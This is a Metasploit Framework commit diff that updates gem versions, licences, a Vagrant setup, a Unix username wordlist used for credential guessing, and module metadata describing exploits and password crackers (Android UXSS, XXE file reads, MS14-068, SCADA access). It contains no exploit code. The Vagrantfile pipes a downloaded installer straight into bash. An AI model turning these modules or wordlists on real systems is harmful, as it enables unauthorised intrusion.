Land #13019, Revert "Land #12960, add ttl to job results instantiated from an RPC request"

This reverts commit ff8bb2e16f, reversing
changes made to ae28463ec6.

Gemfile

@@ -17,7 +17,7 @@ group :development do
   # generating documentation
   gem 'yard'
   # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.73)
+    metasploit-framework (5.0.78)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -20,6 +20,7 @@ PATH
       faraday (<= 0.17.0)
       faye-websocket
       filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
       jsobfu
       json
       metasm
@@ -117,32 +118,33 @@ GEM
     arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     aws-eventstream (1.0.3)
-    aws-partitions (1.269.0)
-    aws-sdk-core (3.89.1)
+    aws-partitions (1.278.0)
+    aws-sdk-core (3.90.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.137.0)
+    aws-sdk-ec2 (1.145.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
     aws-sdk-iam (1.33.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.28.0)
+    aws-sdk-kms (1.29.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.60.1)
+    aws-sdk-s3 (1.60.2)
       aws-sdk-core (~> 3, >= 3.83.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
+    aws-sigv4 (1.1.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.6)
     bit-struct (0.16)
     builder (3.2.4)
+    byebug (11.1.1)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
@@ -178,6 +180,8 @@ GEM
     filesize (0.2.0)
     fivemat (1.3.7)
     hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
     http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
@@ -223,15 +227,15 @@ GEM
     mini_portile2 (2.4.0)
     minitest (5.14.0)
     mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
     multipart-post (2.1.1)
     nessus_rest (0.1.6)
     net-ssh (5.2.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.7)
+    nokogiri (1.10.8)
       mini_portile2 (~> 2.4.0)
-    octokit (4.15.0)
+    octokit (4.16.0)
       faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
@@ -255,8 +259,11 @@ GEM
     pry (0.12.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
+    pry-byebug (3.8.0)
+      byebug (~> 11.0)
+      pry (~> 0.10)
     public_suffix (4.0.3)
-    rack (1.6.12)
+    rack (1.6.13)
     rack-protection (1.5.5)
       rack
     rack-test (0.6.3)
@@ -276,7 +283,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (13.0.1)
     rb-readline (0.5.5)
-    recog (2.3.6)
+    recog (2.3.7)
       nokogiri
     redcarpet (3.5.0)
     rex-arch (0.1.13)
@@ -305,9 +312,10 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.84)
+    rex-powershell (0.1.87)
       rex-random_identifier
       rex-text
+      ruby-rc4
     rex-random_identifier (0.1.4)
       rex-text
     rex-registry (0.1.3)
@@ -356,14 +364,14 @@ GEM
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (2.1.0)
+    rubyzip (2.2.0)
     sawyer (0.8.2)
       addressable (>= 2.3.5)
       faraday (> 0.8, < 2.0)
-    simplecov (0.18.0)
+    simplecov (0.18.5)
       docile (~> 1.1)
-      simplecov-html (~> 0.11.0)
-    simplecov-html (0.11.0)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
     sinatra (1.4.8)
       rack (~> 1.5)
       rack-protection (~> 1.4)
@@ -379,7 +387,7 @@ GEM
     thread_safe (0.3.6)
     tilt (2.0.10)
     timecop (0.9.1)
-    ttfunk (1.6.1)
+    ttfunk (1.6.2.1)
     tzinfo (1.2.6)
       thread_safe (~> 0.1)
     tzinfo-data (1.2019.3)
@@ -404,7 +412,7 @@ DEPENDENCIES
   fivemat
   metasploit-framework!
   octokit
-  pry
+  pry-byebug
   rake
   redcarpet
   rspec-rails

LICENSE

@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

LICENSE_GEMS

@@ -10,32 +10,33 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.269.0, "Apache 2.0"
-aws-sdk-core, 3.89.1, "Apache 2.0"
-aws-sdk-ec2, 1.137.0, "Apache 2.0"
+aws-partitions, 1.278.0, "Apache 2.0"
+aws-sdk-core, 3.90.1, "Apache 2.0"
+aws-sdk-ec2, 1.145.0, "Apache 2.0"
 aws-sdk-iam, 1.33.0, "Apache 2.0"
-aws-sdk-kms, 1.28.0, "Apache 2.0"
-aws-sdk-s3, 1.60.1, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
+aws-sdk-kms, 1.29.0, "Apache 2.0"
+aws-sdk-s3, 1.60.2, "Apache 2.0"
+aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.4, ruby
+bindata, 2.4.6, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
+byebug, 11.1.1, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "GPL-2.0, ruby"
+eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
@@ -44,6 +45,7 @@ faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
@@ -53,7 +55,7 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.73, "New BSD"
+metasploit-framework, 5.0.78, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
@@ -62,14 +64,14 @@ method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.7, MIT
-octokit, 4.15.0, MIT
+nokogiri, 1.10.8, MIT
+octokit, 4.16.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -80,8 +82,9 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
+pry-byebug, 3.8.0, MIT
 public_suffix, 4.0.3, MIT
-rack, 1.6.12, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
@@ -90,7 +93,7 @@ rails-html-sanitizer, 1.3.0, MIT
 railties, 4.2.11.1, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.6, unknown
+recog, 2.3.7, unknown
 redcarpet, 3.5.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -101,7 +104,7 @@ rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.84, "New BSD"
+rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
@@ -122,10 +125,10 @@ ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.1.0, "Simplified BSD"
+rubyzip, 2.2.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.18.0, MIT
-simplecov-html, 0.11.0, MIT
+simplecov, 0.18.5, MIT
+simplecov-html, 0.12.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
@@ -135,7 +138,7 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.6.1, "GPL-2.0, GPL-3.0, Nonstandard"
+ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT

Vagrantfile

@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
     config.vm.provision "shell", inline: step
   end
 
-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
     "curl -L https://get.rvm.io | bash -s stable",
     "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
     "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",

data/wordlists/unix_users.txt

@@ -1,88 +1,131 @@
 
 4Dgifts
-EZsetup
-OutOfBox
-ROOT
+abrt
 adm
 admin
 administrator
 anon
+_apt
+arpwatch
 auditor
 avahi
 avahi-autoipd
 backup
 bbs
+beef-xss
 bin
+bitnami
 checkfs
 checkfsys
 checksys
 chronos
+chrony
 cmwlogin
+cockpit-ws
+colord
 couchdb
+cups-pk-helper
 daemon
 dbadmin
+dbus
+Debian-exim
+Debian-snmp
 demo
 demos
 diag
 distccd
 dni
+dnsmasq
+dradis
+EZsetup
 fal
 fax
 ftp
 games
 gdm
+geoclue
 gnats
+gnome-initial-setup
 gopher
 gropher
 guest
 haldaemon
 halt
 hplip
+inetsim
 informix
 install
+iodine
 irc
+jet
 karaf
 kernoops
+king-phisher
+landscape
+libstoragemgmt
 libuuid
+lightdm
 list
 listen
 lp
 lpadm
 lpadmin
+lxd
 lynx
 mail
 man
 me
 messagebus
+miredo
 mountfs
 mountfsys
 mountsys
+mysql
 news
 noaccess
 nobody
 nobody4
+ntp
 nuucp
+nxautomation
 nxpgsql
+omi
+omsagent
 operator
 oracle
+OutOfBox
 pi
+polkitd
+pollinate
 popr
+postfix
 postgres
 postmaster
 printer
 proxy
 pulse
+redsocks
 rfindd
 rje
 root
+ROOT
 rooty
+rpc
+rpcuser
+rtkit
+rwhod
 saned
 service
+setroubleshoot
 setup
 sgiweb
+shutdown
 sigver
 speech-dispatcher
 sshd
+sslh
+sssd
+stunnel4
 sym
 symop
 sync
@@ -92,22 +135,34 @@ sysadmin
 sysbin
 syslog
 system_admin
+systemd-bus-proxy
+systemd-coredump
+systemd-network
+systemd-resolve
+systemd-timesync
+tcpdump
 trouble
+tss
 udadmin
 ultra
 umountfs
 umountfsys
 umountsys
 unix
+unscd
 us_admin
+usbmux
 user
 uucp
 uucpadm
+uuidd
+vagrant
+varnish
 web
 webmaster
+whoopsie
 www
 www-data
 xpdb
 xpopr
 zabbix
-vagrant

db/modules_metadata_base.json

@@ -64,7 +64,7 @@
     ],
     "description": "This module combines two vulnerabilities to achieve remote code\n        execution on affected Android devices. First, the module exploits\n        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n        versions of Android's open source stock browser (the AOSP Browser) prior to\n        4.4. Second, the Google Play store's web interface fails to enforce a\n        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n        targeted for script injection. As a result, this leads to remote code execution\n        through Google Play's remote installation feature, as any application available\n        on the Google Play store can be installed and launched on the user's device.\n\n        This module requires that the user is logged into Google with a vulnerable browser.\n\n        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
+      "URL-https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
       "URL-http://1337day.com/exploit/description/22581",
       "OSVDB-110664",
       "CVE-2014-6041"
@@ -79,7 +79,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
     "is_install_path": true,
     "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -198,7 +198,7 @@
     ],
     "description": "This module acts as a simplistic administrative client for interfacing\n        with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n        the TLS-250 and TLS-350 protocols.  This has been tested against\n        GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n        been tested against anything else, so use at your own risk.",
     "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
+      "URL-https://blog.rapid7.com/2015/01/22/the-internet-of-gas-station-tank-gauges",
       "URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
       "URL-https://github.com/sjhilt/GasPot",
       "URL-https://github.com/mushorg/conpot",
@@ -216,7 +216,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/atg/atg_client.rb",
     "is_install_path": true,
     "ref_name": "admin/atg/atg_client",
@@ -1204,7 +1204,7 @@
       "CVE-2015-0964",
       "CVE-2015-0965",
       "CVE-2015-0966",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
+      "URL-https://blog.rapid7.com/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
     ],
     "platform": "",
     "arch": "",
@@ -1216,7 +1216,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
     "is_install_path": true,
     "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -2661,7 +2661,7 @@
     "references": [
       "CVE-2013-0136",
       "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -2682,7 +2682,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
     "is_install_path": true,
     "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2907,7 +2907,7 @@
     ],
     "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n        of vectors. This vulnerability can allow an attacker to a craft special XML that\n        could read arbitrary files from the filesystem. This module exploits the\n        vulnerability via the XML API.",
     "references": [
-      "URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
+      "URL-https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24"
     ],
     "platform": "",
     "arch": "",
@@ -2928,7 +2928,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
     "is_install_path": true,
     "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3054,7 +3054,7 @@
       "CVE-2013-3617",
       "OSVDB-99141",
       "BID-63431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "",
     "arch": "",
@@ -3075,7 +3075,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
     "is_install_path": true,
     "ref_name": "admin/http/openbravo_xxe",
@@ -4558,7 +4558,7 @@
       "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
       "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
       "URL-https://github.com/bidord/pykek",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
+      "URL-https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
     ],
     "platform": "",
     "arch": "",
@@ -4570,7 +4570,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
     "is_install_path": true,
     "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -6733,7 +6733,7 @@
     "description": "This module allows an unauthenticated user to interact with the Yokogawa\n        CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n        operations.",
     "references": [
       "CVE-2014-5208",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
+      "URL-https://blog.rapid7.com/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
     ],
     "platform": "",
     "arch": "",
@@ -6745,7 +6745,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-09-24 12:15:43 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
     "is_install_path": true,
     "ref_name": "admin/scada/yokogawa_bkbcopyd_client",
@@ -7946,7 +7946,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-04 19:25:56 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
     "is_install_path": true,
     "ref_name": "admin/wemo/crockpot",
@@ -8083,10 +8083,10 @@
     "name": "Password Cracker: Databases",
     "fullname": "auxiliary/analyze/crack_databases",
     "aliases": [
-      "auxiliary/analyze/jtr_mssql",
-      "auxiliary/analyze/jtr_mysql",
-      "auxiliary/analyze/jtr_oracle",
-      "auxiliary/analyze/jtr_postgres"
+      "auxiliary/analyze/jtr_mssql_fast",
+      "auxiliary/analyze/jtr_mysql_fast",
+      "auxiliary/analyze/jtr_oracle_fast",
+      "auxiliary/analyze/jtr_postgres_fast"
     ],
     "rank": 300,
     "disclosure_date": null,
@@ -8110,7 +8110,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
     "path": "/modules/auxiliary/analyze/crack_databases.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_databases",
@@ -8275,8 +8275,7 @@
     "name": "Password Cracker: Windows",
     "fullname": "auxiliary/analyze/crack_windows",
     "aliases": [
-      "auxiliary/analyze/jtr_crack_fast",
-      "auxiliary/analyze/jtr_windows"
+      "auxiliary/analyze/jtr_windows_fast"
     ],
     "rank": 300,
     "disclosure_date": null,
@@ -8300,7 +8299,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
     "path": "/modules/auxiliary/analyze/crack_windows.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_windows",
@@ -8311,270 +8310,6 @@
     },
     "needs_cleanup": false
   },
-  "auxiliary_analyze/jtr_aix": {
-    "name": "John the Ripper AIX Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_aix",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_aix",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_linux": {
-    "name": "John the Ripper Linux Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_linux",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix systems. The module will only crack\n        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n        Blowfish and SHA(256/512). Warning: This is much slower.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_linux",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mssql_fast": {
-    "name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mssql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mssql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mssql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mysql_fast": {
-    "name": "John the Ripper MySQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mysql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mysql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mysql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_oracle_fast": {
-    "name": "John the Ripper Oracle Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_oracle_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the oracle_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_oracle_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_postgres_fast": {
-    "name": "John the Ripper Postgres SQL Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_postgres_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>"
-    ],
-    "description": "This module uses John the Ripper to attempt to crack Postgres password\n          hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n          JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n          format.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_postgres_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_windows_fast": {
-    "name": "John the Ripper Windows Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_windows_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n        of this module is to find trivial passwords in a short amount of time. To\n        crack complex passwords or use large wordlists, John the Ripper should be\n        used outside of Metasploit. This initial version just handles LM/NTLM credentials\n        from hashdump and uses the standard wordlist and rules.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_windows_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
   "auxiliary_analyze/modbus_zip": {
     "name": "Extract zip from Modbus communication",
